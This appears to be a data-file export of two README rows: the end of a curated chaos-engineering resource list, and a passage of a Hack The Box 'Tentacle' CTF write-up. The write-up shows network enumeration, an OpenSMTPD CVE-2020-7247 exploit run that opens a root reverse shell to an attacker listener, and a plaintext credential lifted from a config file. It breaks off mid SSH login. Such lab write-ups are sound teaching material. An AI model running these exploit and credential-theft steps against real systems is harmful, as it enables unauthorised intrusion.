Engineering](https://www.infoq.com/minibooks/emag-chaos-engineering)\n* [Learning Chaos Engineering](http://shop.oreilly.com/product/0636920251897.do)\n* [Chaos Engineering: System Resilience in Practice](https://www.oreilly.com/library/view/chaos-engineering/9781492043850/)\n* [Chaos Engineering: Crash test your applications](https://www.manning.com/books/chaos-engineering)\n* [Security Chaos Engineering: Gaining Confidence in Resilience and Safety at Speed and Scale](https://www.oreilly.com/library/view/security-chaos-engineering/9781492080350/)\n* [Chaos Engineering Observability](https://www.humio.com/resources/reports/chaos-observability/)\n\n## Education\n* A Chaos Engineering Bootcamp for O'Reilly Velocity 2017 - [Slides](https://speakerdeck.com/tammybutow/chaos-engineering-bootcamp) & [Source code](https://github.com/tammybutow/chaos_engineering_bootcamp)\n* [Your First Chaos Experiment](https://www.gremlin.com/community/tutorials/your-first-chaos-experiment)\n* [Chaos Engineering 101](https://sharpend.io/chaos-engineering-101/)\n* [A Primer on Automating Chaos](https://www.gremlin.com/community/tutorials/a-primer-on-automating-chaos)\n* [Intro to Chaos Engineering](https://www.youtube.com/watch?v=qHykK5pFRW4)\n* [Learn the basics of the Chaos Toolkit](https://www.katacoda.com/chaostoolkit/courses/01-chaostoolkit-getting-started)\n* [Build System Confidence with Chaos Engineering](https://medium.com/chaosiq/improve-your-cloud-native-devops-flow-with-chaos-engineering-dc32836c2d9a)\n* [How we break things at Twitter: failure testing](https://blog.twitter.com/engineering/en_us/a/2015/how-we-break-things-at-twitter-failure-testing.html)\n* [Run Chaos Experiments Without Risking Your Job](https://blog.loadmill.com/run-chaos-experiments-without-risking-your-job-2c8a5f4b0bfc)\n* [A Guide to Your First Chaos Day](https://victorops.com/blog/a-guide-to-your-first-chaos-day)\n* [Planning Your Own Chaos 
Day](https://www.gremlin.com/community/tutorials/planning-your-own-chaos-day/)\n* [How To Install Distributed Tensorflow on GCP and Perform Chaos Engineering Experiments](https://www.gremlin.com/community/tutorials/how-to-install-distributed-tensorflow-on-gcp-and-perform-chaos-engineering-experiments/)\n* [Monitoring Your Chaos Experiments](https://www.brighttalk.com/webcast/15087/316835)\n* [Increasing the Resilience of APIs with Chaos Engineering](https://www.infoq.com/news/2018/05/gremlin-api-chaos)\n* [3 key steps for running chaos engineering experiments](https://www.infoworld.com/article/3268017/devops/3-key-steps-for-running-chaos-engineering-experiments.html)\n* [Exploring Multi-level Weaknesses using Automated Chaos Experiments](https://medium.com/chaosiq/exploring-multi-level-weaknesses-using-automated-chaos-experiments-aa30f0605ce)\n* [Chaos Monkey Guide for Engineers](https://www.gremlin.com/chaos-monkey/)\n* [Chaos Engineering for Serverless](https://www.youtube.com/playlist?list=PL70SCo-0vujiQkPAOGuZP-kNZZkzcPVKD)\n* [Network Fire Drills with Chaos Engineering](https://speakerdeck.com/homingli/network-automation-meetup-network-fire-drills-with-chaos-engineering)\n* [DevOps Foundations: Chaos Engineering](https://www.linkedin.com/learning/devops-foundations-chaos-engineering/)\n* [Resilience Engineering: Short Course](http://csel.org.ohio-state.edu/ResilienceEngineering.html)\n* [The Chaos Engineering Collection](https://medium.com/@adhorn/the-chaos-engineering-collection-5e188d6a90e2)\n* [Pentester Academy](https://www.pentesteracademy.com/onlinelabs)\n* [Consul and Chaos Engineering](https://learn.hashicorp.com/tutorials/consul/introduction-chaos-engineering?in=consul/resiliency)\n\n## Notable Tools\n* [Chaos Monkey](https://github.com/Netflix/chaosmonkey) - A resiliency tool that helps applications tolerate random instance failures.\n* [orchestrator](https://github.com/github/orchestrator) - MySQL replication topology management and HA.\n* 
[kube-monkey](https://github.com/asobti/kube-monkey) - An implementation of Netflix's Chaos Monkey for Kubernetes clusters.\n* [Gremlin Inc.](https://www.gremlin.com/) - Failure as a Service.\n* [Chaos Toolkit](https://github.com/chaostoolkit/chaostoolkit) - A chaos engineering toolkit to help you build confidence in your software system.\n* [steadybit](https://www.steadybit.com/) - A Chaos Engineering platform (SaaS or On-Prem) with auto discovery features, different attack types, user management and many more.\n* [PowerfulSeal](https://github.com/bloomberg/powerfulseal) - Adds chaos to your Kubernetes clusters, so that you can detect problems in your systems as early as possible. It kills targeted pods and takes VMs up and down.\n* [drax](https://github.com/dcos-labs/drax) - DC/OS Resilience Automated Xenodiagnosis tool. It helps to test DC/OS deployments by applying a Chaos Monkey-inspired, proactive and invasive testing approach.\n* [Wiremock](http://wiremock.org/) - API mocking (Service Virtualization) which enables modeling real world faults and delays\n* [MockLab](http://get.mocklab.io/) - API mocking (Service Virtualization) as a service which enables modeling real world faults and delays.\n* [Pod-Reaper](https://github.com/target/pod-reaper) - A rules based pod killing container. 
Pod-Reaper was designed to kill pods that meet specific conditions that can be used for Chaos testing in Kubernetes.\n* [Muxy](https://github.com/mefellows/muxy/) - A chaos testing tool for simulating real-world distributed system failures.\n* [Toxiproxy](https://github.com/Shopify/toxiproxy) - A TCP proxy to simulate network and system conditions for chaos and resiliency testing.\n* Chaos engineering for Docker:\n * [Pumba](https://github.com/gaia-adm/pumba) - Chaos testing and network emulation for Docker containers (and clusters).\n * [Blockade](https://github.com/worstcase/blockade) - Docker-based utility for testing network failures and partitions in distributed applications.\n* [chaos-lambda](https://github.com/bbc/chaos-lambda) - Randomly terminate ASG instances during business hours.\n* [Namazu](https://github.com/osrg/namazu) - Programmable fuzzy scheduler for testing distributed systems.\n* [Chaos Monkey for Spring Boot](https://codecentric.github.io/chaos-monkey-spring-boot/) - Injects latencies, exceptions, and terminations into Spring Boot applications\n* [Byte-Monkey](https://github.com/mrwilson/byte-monkey) - Bytecode-level fault injection for the JVM. It works by instrumenting application code on the fly to deliberately introduce faults like exceptions and latency.\n* [GomJabbar](https://github.com/outbrain/GomJabbar) - ChaosMonkey for your private cloud\n* [Turbulence](https://github.com/cppforlife/turbulence-release) - Tool focused on BOSH environments capable of stressing VMs, manipulating network traffic, and more. 
It is very similar to Gremlin.\n* [chaosblade](https://github.com/chaosblade-io/chaosblade) - An Easy to Use and Powerful Chaos Engineering Toolkit.\n* [KubeInvaders](https://github.com/lucky-sideburn/KubeInvaders) - Gamified Chaos engineering tool for Kubernetes Clusters\n* [Cthulhu](https://github.com/xmatters/cthulhu-chaos-testing) - Chaos Engineering tool that helps evaluate the resiliency of microservice systems simulating various disaster scenarios against a target infrastructure in a data-driven manner.\n* [VMware Mangle](https://vmware.github.io/mangle/) - Orchestrating Chaos Engineering.\n* [Byteman](https://byteman.jboss.org/) - A Swiss Army Knife for Byte Code Manipulation.\n* [Litmus](https://github.com/litmuschaos/litmus) - Framework for Kubernetes environments that enables users to run test suites, capture logs, generate reports and perform chaos tests.\n* [Perses](https://github.com/nicolasmanic/perses) - A project to cause (controlled) destruction to a JVM application.\n* [ChaosKube](https://github.com/linki/chaoskube) - chaoskube periodically kills random pods in your Kubernetes cluster. \n* [Chaos Mesh](https://github.com/chaos-mesh/chaos-mesh) - Chaos Mesh is a cloud-native Chaos Engineering platform that orchestrates chaos on Kubernetes environments.\n* [failure-lambda](https://github.com/gunnargrosch/failure-lambda) - A small Node module for injecting failure into AWS Lambda using latency, exception, statuscode or diskspace.\n* [aws-chaos-scripts](https://github.com/adhorn/aws-chaos-scripts) - Collection of python scripts to run failure injection on AWS infrastructure\n* [chaos-ssm-documents](https://github.com/adhorn/chaos-ssm-documents) - Collection of AWS SSM Documents to perform Chaos Engineering experiments\n* [aws-lambda-chaos-injection](https://github.com/adhorn/aws-lambda-chaos-injection) - A library injecting chaos into AWS Lambda. 
It offers simple python decorators to do delay, exception and statusCode injection and a Class to add delay to any 3rd party dependencies.\n* [chaos-dingo](https://github.com/jmspring/chaos-dingo) - A tool to mess with Azure services using the Azure NodeJS SDK.\n* [Chaos HTTP Proxy](https://github.com/bouncestorage/chaos-http-proxy) - Introduce failures into HTTP requests via a proxy server\n* [Chaos Lemur](https://github.com/strepsirrhini-army/chaos-lemur) - A self-hostable application to randomly destroy virtual machines in a BOSH-managed environment\n* [Simoorg](https://github.com/linkedin/simoorg) - Linkedin’s very own failure inducer framework.\n* [react-chaos](https://github.com/jchiatt/react-chaos) - A chaos engineering tool for your React apps\n* [vue-chaos](https://github.com/aviadhahami/vue-chaos) - A chaos engineering tool for your Vue apps\n* [Chaos Engine](https://github.com/ThalesGroup/chaos-engine) - tool designed to intermittently destroy or degrade application resources running in cloud based infrastructure. [Documentation](https://thalesgroup.github.io/chaos-engine/)\n* [kubedoom](https://github.com/storax/kubedoom) - Kill Kubernetes pods by playing Id's DOOM.\n* [kubethanos](https://github.com/berkay-dincer/kubethanos) - Kills half of your randomly selected Kubernetes pods.\n* [go-fault](https://github.com/github/go-fault) - Fault injection middleware in Go\n* [Proofdock's Chaos Engineering Platform](https://proofdock.io) - A chaos engineering platform that seamlessly integrates in Azure DevOps and has a focus on the Azure cloud platform.\n* [Pystol](https://www.pystol.org/docs) - Pystol is a fault injection platform allowing users to execute fault injection Actions in cloud-native environments in a controlled and prescribed way.\n* [AWSSSMChaosRunner](https://github.com/amzn/awsssmchaosrunner) - Amazon's light-weight open-source library for chaos engineering on AWS. 
It can be used for [EC2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html), [ECS (with EC2 launch type)](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/getting-started-ecs-ec2.html) and [Fargate](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/getting-started-fargate.html).\n* [Kraken](https://github.com/cloud-bulldozer/kraken) - Chaos and resiliency testing tool for Kubernetes and OpenShift.\n* [kube-burner](https://github.com/cloud-bulldozer/kube-burner) - A tool aimed at stressing Kubernetes clusters by creating or deleting a high quantity of objects.\n* [Chaos Experimentation Framework](https://github.com/lyft/clutch) - An extensible platform for infrastructure management including Chaos Engineering \n* [NetHavoc](https://www.cavisson.com/nethavoc-resilience-testing-solution/) - A Chaos Engineering Tool for Linux, K8s, Windows, PCF, Cloud, and Containers for injecting Resource, Infrastructure, Network, and Application failures.\n* [gorm-sqlchaos](https://github.com/u2386/gorm-sqlchaos) - A runtime SQL manipulator for your Golang applications based on gorm.\n* [Chaos Frontend Toolkit](https://chaos-frontend-toolkit.web.app/) - A set of tools to apply Chaos Engineering to frontend\n* [Mitigant](https://mitigant.io/) - The Continuous Security Verification Platform enables confidence in cloud security posture by leveraging security chaos engineering.\n\n## Retired tools\n* [The Simian Army](https://github.com/Netflix/SimianArmy) - A suite of tools for keeping your cloud operating in top form.\n* [ChaoSlingr](https://github.com/Optum/ChaoSlingr) - Introducing Security Chaos Engineering. 
ChaoSlingr focuses primarily on the experimentation on AWS Infrastructure to proactively instrument system security failure through experimentation.\n\n## Cloud Services\n* [Testing Amazon Aurora Using Fault Injection Queries](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/AuroraMySQL.Managing.html#AuroraMySQL.Managing.FaultInjectionQueries)\n* [Azure Chaos Studio](https://aka.ms/azurechaosstudio) - A managed fault injection service for Azure applications. See also [Azure Fault Analysis Service](https://docs.microsoft.com/azure/service-fabric/service-fabric-testability-overview) for Azure Service Fabric applications.\n* [Security Chaos Engineering for Cloud Services](https://medium.com/@run2obtain/from-resilience-to-dependability-security-chaos-engineering-for-cloud-services-9c6d6d152ed2)\n\n## Papers\n* [Maelstrom: Mitigating Datacenter-level Disasters by Draining Interdependent Traffic Safely and Efficiently](https://www.usenix.org/system/files/osdi18-veeraraghavan.pdf)\n* [Simple Testing Can Prevent Most Critical Failures: An Analysis of Production Failures in Distributed Data-Intensive Systems](https://www.usenix.org/system/files/conference/osdi14/osdi14-paper-yuan.pdf)\n* [Automating Failure Testing Research at Internet Scale ](https://people.ucsc.edu/~palvaro/fit-ldfi.pdf)\n* [Principles of Antifragile Software](https://arxiv.org/abs/1404.3056)\n* [Why is random testing effective for partition tolerance bugs?](https://dl.acm.org/citation.cfm?id=3177123.3158134)\n* [Chaos Engineering](https://arxiv.org/abs/1702.05843)\n* [A Platform for Automating Chaos Experiments](https://arxiv.org/abs/1702.05849)\n* [A Chaos Engineering System for Live Analysis and Falsification of Exception-handling in the JVM](https://arxiv.org/abs/1805.05246)\n* [TripleAgent: Monitoring, Perturbation And Failure-obliviousness for Automated Resilience Improvement in Java Applications](https://arxiv.org/abs/1812.10706)\n* [Lineage-driven Fault 
Injection](https://dl.acm.org/citation.cfm?id=2723711)\n* [Antifragility is a Fragile Concept](https://www.linkedin.com/pulse/antifragility-fragile-concept-casey-rosenthal/)\n* [Chaos Engineering Security](https://jaxenter.com/chaos-engineering-security-163358.html)\n* [Security Chaos Engineering: A new paradigm for cybersecurity](https://opensource.com/article/18/1/new-paradigm-cybersecurity)\n* [Security Challenges around Chaos Engineering](https://www.conjur.org/blog/security-challenges-around-chaos-engineering/)\n* [CloudStrike: Security Chaos Engineering for Cloud Services](https://www.researchgate.net/publication/335922038_Security_Chaos_Engineering_for_Cloud_Services)\n* [Observability and Chaos Engineering on System Calls for Containerized Applications in Docker](https://arxiv.org/abs/1907.13039)\n* [Maximizing Error Injection Realism for Chaos Engineering with System Calls](https://arxiv.org/abs/2006.04444)\n* [Chaos Engineering of Ethereum Blockchain Clients](https://arxiv.org/abs/2111.00221)\n\n## Gamedays\n* [Target: What is a Gameday?](https://tech.target.com/2019/05/09/chaos-engineering-at-Target.html) - Chaos Gamedays experience by Target.\n* [Codecentric: Chaos Engineering Gamedays](https://blog.codecentric.de/en/2018/08/chaos-engineering-gameday/) - Chaos Gamedays by Codecentric.\n* [New Relic: How to run a Gameday?](https://blog.newrelic.com/engineering/how-to-run-a-game-day/) - Chaos Gamedays experience by New Relic.\n* [Dius: Gamedays resources](https://dius.com.au/resources/game-day/) - Resources for getting started with GameDay and Chaos Engineering.\n* [Gremlin: Gamedays](https://www.gremlin.com/gameday/) - Resources for getting started with GameDay and Chaos Engineering.\n* [Gremlin: What is a Chaos Day?](https://www.gremlin.com/community/tutorials/planning-your-own-chaos-day/#what-is-a-chaos-day) - What is a Gameday according to Gremlin.\n* [Gremlin: Why run a Chaos 
Day?](https://www.gremlin.com/community/tutorials/planning-your-own-chaos-day/#why-run-a-chaos-day) - Reasons to run Gamedays according to Gremlin.\n* [Gremlin: How to run a Gameday?](https://www.gremlin.com/community/tutorials/how-to-run-a-gameday/) - Methodology to run Gamedays according to Gremlin. \n* [Gremlin DB: Breaking Dynamo DB](https://www.gremlin.com/community/tutorials/gremlin-gameday-breaking-dynamodb/) - Example of a Gameday with DynamoDB by Gremlin.\n* [Gremlin: Introduction to Gameday](https://www.gremlin.com/community/tutorials/introduction-to-gamedays/) - What is a Gameday according to Gremlin.\n* [Gremlin: Planning your own Chaos Day](https://www.gremlin.com/community/tutorials/planning-your-own-chaos-day/) - Example of a Gameday with DynamoDB by Gremlin.\n* [Gremlin: Inside Gremlin 2019 Gremlin Gamedays Roadmap](https://www.gremlin.com/community/tutorials/inside-gremlin-2019-gremlin-gamedays-roadmap/) - Chaos Gamedays experience by Gremlin.\n* [Gremlin: What I learned running the Chaos Lab with Kafka](https://www.gremlin.com/community/tutorials/what-i-learned-running-the-chaos-lab-kafka-breaks/) - Example of a Gameday with Kafka by Gremlin.\n* [Chaos Toolkit: Chaos Engineering with Humans in the loop](https://medium.com/chaos-toolkit/chaos-engineering-with-humans-in-the-loop-f4854900b1eb) - Article about Chaos Gamedays.\n* [GoCardless: All fun and games until you start with Gamedays](https://gocardless.com/blog/game-days-at-gc/) - Article about Chaos Gamedays.\n* [InfoQ: Gamedays - Achieving Resilience through Chaos Engineering](https://www.infoq.com/presentations/gameday-chaos-engineering) - InfoQ Presentation with experiences about Chaos Gamedays.\n\n## Blogs & Newsletters\n* [Netflix Technology Blog](https://medium.com/@NetflixTechBlog) - Learn more about how Netflix designs, builds, and operates our systems and engineering organizations.\n* [Production Ready](https://tinyletter.com/production-ready) - A mailing list about building resilient 
infrastructure and tools.\n* [SRE Weekly](https://sreweekly.com/) - Weekly Site Reliability Newsletter.\n* [Site Reliability Engineering resources](https://github.com/dastergon/awesome-sre) - A curated list of awesome Site Reliability and Production Engineering resources.\n* [SysAdvent](https://sysadvent.blogspot.com) - One article for each day of December, ending on the 25th article.\n* [Gremlin Blog](https://blog.gremlininc.com) - Blogs on Chaos Engineering from Gremlin Inc.\n* [O’Reilly Systems Engineering and Operations Newsletter](http://www.oreilly.com/webops-perf/newsletter.html) - Weekly systems engineering and operations news and insights from industry insiders.\n* [LaunchDarkly Blog](http://blog.launchdarkly.com/) - Continuous delivery and feature flags blog.\n* [Verica](https://www.verica.io/) - Chaos engineering, security chaos engineering and continuous verification.\n* [Proofdock](https://medium.com/proofdock) - Reliability, resilience and chaos engineering with a focus on MS Azure\n* [LitmusChaos Blog](https://dev.to/t/litmuschaos/latest) - Blogs on Chaos Engineering from LitmusChaos\n* [ChaosEngineering.news](https://chaosengineering.news/) - Chaos Engineering newsletter. All things chaos engineering, directly to your inbox!\n* [Chaos Mesh Blog](https://chaos-mesh.org/blog) - Blogs on Chaos Engineering from Chaos Mesh.\n* [Chaos Experimentation Framework](https://eng.lyft.com/chaos-experimentation-an-open-source-framework-built-on-top-of-envoy-proxy-df87519ed681) - Chaos Experimentation, an open-source framework built on top of Envoy Proxy\n* [Squadcast](https://squadcast.com/blog) - Blog on Site Reliability engineering.\n* [steadybit Blog](https://www.steadybit.com/blog) - Blogs on Chaos Engineering, Resilience, SRE and OPS from steadybit.\n\n## Podcasts\n* [Break Things On Purpose](https://podcasts.apple.com/us/podcast/break-things-on-purpose/id1460542551) - Monthly podcast about Chaos Engineering presented by Gremlin Inc. 
Also available on Spotify, Google Play, and Stitcher.\n\n## Conferences & Meetups\n* [Chaos Carnival](https://chaoscarnival.io/) - A global two-day virtual conference for Cloud Native Chaos Engineering. \n* [Chaos Conf](https://chaosconf.splashthat.com/) - A day of Chaos Engineering demos, expert advice, and connect with your peers putting chaos into practice at their companies.\n* [SRECon Conferences](https://www.usenix.org/conferences/byname/925) - The official SRE conference.\n* [LISA Conferences](https://www.usenix.org/conferences/byname/5) - Prominent conference about SysAdmin/DevOps/SRE.\n* [O'Reilly Velocity Conference](https://conferences.oreilly.com/velocity/) - Prominent conference about Systems Engineering/DevOps/SRE.\n* [Chaos Engineering Community Meetup Group](https://www.meetup.com/Chaos-Engineering-Community/) - Bay Area Meetup group for Chaos Engineers.\n* [London Chaos Engineering Community](https://www.meetup.com/London-Chaos-Engineering-Community/) - London Area Meetup group for Chaos Engineers.\n* [Stockholm Chaos Engineering Meetup](https://www.meetup.com/Stockholm-Chaos-Engineering-Community/) - Stockholm Meetup group for Chaos Engineers.\n* [Chaos Engineering Community](https://www.meetup.com/pro/chaos/) - A collection of meetups across the globe about Chaos Engineering.\n* [Conf42.com: Chaos Engineering](https://conf42.com) - Chaos Engineering for practitioners and adopters - London UK, 23 Jan 2020.\n* [Kubernetes Chaos Engineering Meetup Group India](https://www.meetup.com/Kubernetes-Chaos-Engineering-Meetup-Group-India/) - India Meetup group for Chaos Engineers.\n\n## Forums\n* [Chaos Community Google Group](https://groups.google.com/forum/#!forum/chaos-community)\n* [Chaos Engineering LinkedIn Group](https://www.linkedin.com/groups/7057761)\n* [Chaos Engineering Slack Community](https://gremlin.com/community)\n* [CNCF Chaos Engineering Working Group](https://groups.google.com/forum/#!forum/chaoseng-wg)\n* CNCF Chaos Engineering Working 
Group Slack: #chaosengineering (slack.cncf.io)\n* [CNCF Chaos Engineering Working Group Github](https://github.com/chaoseng/wg-chaoseng)\n* [Chaos Toolkit Slack Community](https://join.chaostoolkit.org)\n* [Litmus Chaos Engineering Slack Community](https://slack.litmuschaos.io/)\n\n## Contributing\n\nPlease take a look at the [contribution guidelines](CONTRIBUTING.md) first. Contributions are always welcome!\n"
3,"<p align=""center""><img src=""src/banner.png"" alt=""Banner""></img></p>\n<p align=""center"">Creator: <a href=""https://app.hackthebox.eu/polarbearer/159204"">polarbearer</a></p>\n\n# Personal thoughts\nA hard box which has less solvers even than an insane box! Made me learn a lot of stuff like dns records, proxychaining, kerberos and so on... As usual, I tried to explain the steps as simple as I can. Hope you'll find it useful; if so, consider [suporting](https://www.buymeacoffee.com/f4T1H21) a student to get `OSCP` exam and +respecting my profile in HTB.\n\n<a href=""https://app.hackthebox.eu/profile/184235"">\n <img src=""https://www.hackthebox.eu/badge/image/184235"" alt=""f4T1H"">\n </img>\n</a>\n<br>\n<a href=""https://www.buymeacoffee.com/f4T1H21"">\n <img src=""https://raw.githubusercontent.com/f4T1H21/f4T1H21/main/support.png"" height=""40"" alt=""Support"">\n </img>\n</a><br><br>\nNow, let me get right into it.\n\n---\n\n# Reconnaissance\nThe cliche... :\n```bash\nnmap -sS -sV -sC -p- 10.10.10.224\n```\n```bash\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 8.0 (protocol 2.0)\n| ssh-hostkey:\n| 3072 8d:dd:18:10:e5:7b:b0:da:a3:fa:14:37:a7:52:7a:9c (RSA)\n| 256 f6:a9:2e:57:f8:18:b6:f4:ee:03:41:27:1e:1f:93:99 (ECDSA)\n|_ 256 04:74:dd:68:79:f4:22:78:d8:ce:dd:8b:3e:8c:76:3b (ED25519)\n53/tcp open domain ISC BIND 9.11.20 (RedHat Enterprise Linux 8)\n| dns-nsid:\n|_ bind.version: 9.11.20-RedHat-9.11.20-5.el8\n88/tcp open kerberos-sec MIT Kerberos (server time: 2021-06-17 12:49:01Z)\n3128/tcp open http-proxy Squid http proxy 4.11\n|_http-server-header: squid/4.11\n|_http-title: ERROR: The requested URL could not be retrieved\n9090/tcp closed zeus-admin\nService Info: Host: REALCORP.HTB; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:8\n```\n\nHere we have three ports except `22/ssh`, let's start with the kerberos server at the port `88/kerberos-sec`.\n\n## 88/kerberos-sec\n\nActually, we don't have much choice here, let's take a look at the binary web 
content:\n```bash\ncurl http://10.10.10.224:88 --http0.9 --output - | strings\n```\n```\n`~^0\\n20210618150926Z\nREALCORP.HTB\nkrbtgt\nREALCORP.HTB\n```\nWe got two things here:\n- `REALCORP.HTB` which is a domain. (Also a clue about __default Kerberos 5 realm__)\n- `krbtgt` which is the local default account which acts as a service account for the Key Distribution Center (KDC) service.\n\nAdd the domain to `/etc/hosts` and let's continue with the port `3128/http-proxy`.\n\n## 3128/http-proxy\n![](src/3128browser.png)\n\nHere we got another two things:\n- `j.nakazawa@realcorp.htb` a username and another domain.\n- `srv01.realcorp.htb` a new __subdomain__.\n\nSee the subdomain? Maybe we need to enumerate the `53/dns` to find out what's going on.\n\n## 53/dns\nAs I mentioned my previous writeups, I love using `gobuster`. You can go with `dnsenum`, `wfuzz` or your own tool...\n- Let's go with the domain we found in the __mail__ address.\n\n```bash\n┌──(root💀kali)-[~/hackthebox/tentacle]\n└─> gobuster -q dns -d realcorp.htb -r 10.10.10.224:53 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -i\nFound: ns.realcorp.htb [10.197.243.77]\nFound: proxy.realcorp.htb [10.197.243.77]\nFound: wpad.realcorp.htb [10.197.243.31]\nFound: srv01.realcorp.htb [10.10.10.224]\n```\nOh, here we found new subdomains and two new ip addresses. 
`proxy.realcorp.htb` is a [`CNAME`](https://en.wikipedia.org/wiki/CNAME_record) record to `ns.realcorp.htb` and `ns` stands for nameserver.<br>\nAs you can guess, we can't access these ips directly, which means we need to use proxychaining to access them for this case.\n\n### `proxychains` configuration\nWe are going to use a tool called `proxychains`, so make sure you installed it on your system.<br>\nDo comment any other proxy entries and add the following lines at the end of your `/etc/proxychains.conf` file.\n```\nhttp\t10.10.10.224 3128\nhttp\t127.0.0.1 3128\nhttp\t10.197.243.77 3128\n```\nWe're going with `strict_chain` but you can go with `dynamic_chain` too.\n- Here's a [video](https://www.youtube.com/watch?v=NN9fQwiomAU) to understand `proxychains` mechanism.\n\nNow, we're ready to look at the ip: `10.197.243.31`<br>\nLet's scan it:\n```bash\n┌──(root💀kali)-[~/hackthebox/tentacle]\n└─> proxychains -q nmap -sT -Pn 10.197.243.31 --top-ports 1000\nHost discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-06-18 19:34 +03\nNmap scan report for wpad.realcorp.htb (10.197.243.31)\nHost is up (0.24s latency).\nNot shown: 993 closed ports\nPORT STATE SERVICE\n22/tcp open ssh\n53/tcp open domain\n80/tcp open http\n88/tcp open kerberos-sec\n464/tcp open kpasswd5\n749/tcp open kerberos-adm\n3128/tcp open squid-http\n\nNmap done: 1 IP address (1 host up) scanned in 241.18 seconds\n```\n\n### WPAD (Web Proxy Auto-Discovery Protocol)\n>[WPAD](https://en.wikipedia.org/wiki/Web_Proxy_Auto-Discovery_Protocol) is a method used by clients to locate the URL of a configuration file using DHCP and/or DNS discovery methods. Once detection and download of the configuration file is complete, it can be executed to determine the proxy for a specified URL. 
Default name for the configuration file is: `wpad.dat`\n\nHere we see an http server, let's look for the file.\n\n- First add `10.197.243.31 wpad.realcorp.htb` to your `/etc/hosts`.\n\n```bash\n┌──(root💀kali)-[~/hackthebox/tentacle]\n└─> proxychains -q curl http://wpad.realcorp.htb/wpad.dat\nfunction FindProxyForURL(url, host) {\n if (dnsDomainIs(host, ""realcorp.htb""))\n return ""DIRECT"";\n if (isInNet(dnsResolve(host), ""10.197.243.0"", ""255.255.255.0""))\n return ""DIRECT"";\n if (isInNet(dnsResolve(host), ""10.241.251.0"", ""255.255.255.0""))\n return ""DIRECT"";\n\n return ""PROXY proxy.realcorp.htb:3128"";\n}\n```\n\nThis time we catch a tartar, that's a totally new `subnet`...<br>\nWe can't use host discovery in `nmap`, that makes things too long. But I used my mind and made things easier; while scanning the whole ip range, I encountered one ` ... OK` and moved from that ip address.\n\n![](src/subnetscan.png)\n\n# Foothold: CVE 2020-7247\nLet's scan this ip address's running service versions:\n\n```bash\nproxychains nmap -sT -sV -Pn 10.241.251.113 --top-ports 100\n```\n```c\nPORT STATE SERVICE VERSION\n25/tcp open smtp OpenSMTPD\nService Info: Host: smtp.realcorp.htb\n```\nAfter googling a bit about `OpenSMTPD`, I found [this](https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt) article. Now time to exploit it, I tried many exploits from the internet but I'm going to recommend you to use my PoC exploit from [this](https://github.com/f4T1H21/CVE-2020-7247) link. 
You can see, it definitely makes sense!\n\n```bash\n┌──(root💀f4T1H)-[~/hackthebox/tentacle]\n└─> proxychains -q python3 exploit.py 10.241.251.113 25 j.nakazawa@realcorp.htb 10.10.14.166 2121\n[+] Opening connection to 10.241.251.113 on port 25: Done\n[+] Target port is running OpenSMTPD!\n[+] Sending HELO: Done\n[+] Target is vulnerable!\n[+] Checking the mail address: Valid\n[+] Sending the payload: Done\n[*] Closed connection to 10.241.251.113 port 25\n---------------------------------------------------------\n[+] Trying to bind to 10.10.14.166 on port 2121: Done\n[+] Waiting for connections on 10.10.14.166:2121: Got connection from 10.10.10.224 on port 36780\n[*] Switching to interactive mode\nbash: cannot set terminal process group (545): Inappropriate ioctl for device\nbash: no job control in this shell\nroot@smtp:~> $ id\nid\nuid=0(root) gid=0(root) groups=0(root)\nroot@smtp:~> $\n```\nHere we finally got a shell as `root`, but in the `smtp` server.\nAfter a bit of enumeratig, I found `msmtp` client configuration file in `/home/j.nakazawa/.msmtprc`.\n\n```bash\nroot@smtp:/home/j.nakazawa> $ cat .msmtprc\ncat .msmtprc\n# Set default values for all following accounts.\ndefaults\nauth on\ntls on\ntls_trust_file /etc/ssl/certs/ca-certificates.crt\nlogfile /dev/null\n\n# RealCorp Mail\naccount realcorp\nhost 127.0.0.1\nport 587\nfrom j.nakazawa@realcorp.htb\nuser j.nakazawa\npassword sJB}RM>6Z~64_\ntls_fingerprint C9:6A:B9:F6:0A:D4:9C:2B:B9:F6:44:1F:30:B8:5E:5A:D8:0D:A5:60\n\n# Set a default account\naccount default : realcorp\nroot@smtp:/home/j.nakazawa> $\n```\nAnd here we got some credentials: `j.nakazawa`:`sJB}RM>6Z~64_`<br>\nBut weirdly ssh was not working for direct login with these credentials!<br><br>\nThinking about generally a little bit, gives us the big clue: As you can remember we have a `kerberos-sec` server on the main target, which means we can use tickets to authenticate in something if it configured 
properly!\n\n![](/src/gifs/bingobango.gif)\n\nOkay, let me take one step back:\n\n- What is `kerberos`?\n>A computer-network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.\n\n## Creating a `kerberos` ticket\n### Step #1\nFirst install the package by typing:\n```bash\napt-get install krb5-user\n```\n\n__Attention__: Now we need to configure the kerberos by editing `/etc/krb5.conf`, for that you need to add following lines to their proper sections in the file.\n```bash\n[libdefaults]\n default_realm = REALCORP.HTB\n\n[realms]\n REALCORP.HTB = {\n kdc = 10.10.10.224\n }\n\n[domain_realm]\n .realcorp.htb = REALCORP.HTB\n```\n### Step #2\nCreate a ticket for the user `j.nakazawa`:\n```bash\n┌──(root💀f4T1H)-[~/hackthebox/tentacle]\n└─> kinit j.nakazawa\nPassword for j.nakazawa@REALCORP.HTB:\n\n```\nEnter the password, and we're ready to go. But first, check the ticket we created:\n```bash\n┌──(root💀f4T1H)-[~/hackthebox/tentacle]\n└─> klist \nTicket cache: FILE:/tmp/krb5cc_0\nDefault principal: j.nakazawa@REALCORP.HTB\n\nValid starting Expires Service principal\n06/19/2021 07:12:33 06/20/2021 07:00:21 krbtgt/REALCORP.HTB@REALCORP.HTB\n```\n\n__Atention__: Make sure you only have the following domain for the `10.10.10.224` ip address in your `/etc/hosts` file.\n```c\n10.10.10.224 srv01.realcorp.htb\n```\n## Step #3\nConnect directly via ssh as the user `j.nakazawa`:\n```bash\n┌──(root💀f4T1H)-[~/hackthebox/tentacle]\n└─> ssh j.nakazawa@10.10.10.224\nActivate the web console with: systemctl enable --now cockpit.socket\n\nLast login: Sat Jun 19 05:26:12 